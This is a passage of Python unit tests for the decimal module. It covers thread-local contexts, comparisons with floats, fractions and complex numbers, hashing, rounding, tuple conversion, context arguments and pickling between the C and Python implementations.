cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
@threading_helper.requires_working_threading()
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
th1.join()
th2.join()
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
decimal = C
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hash(int(value)))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(d), hash(f))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_hash_method_nan(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, hash, Decimal('sNaN'))
value = Decimal('NaN')
self.assertEqual(hash(value), object.__hash__(value))
class H:
def __hash__(self):
return 42
class D(Decimal, H):
pass
value = D('NaN')
self.assertEqual(hash(value), object.__hash__(value))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
@cpython_only
def test_small_ints(self):
Decimal = self.decimal.Decimal
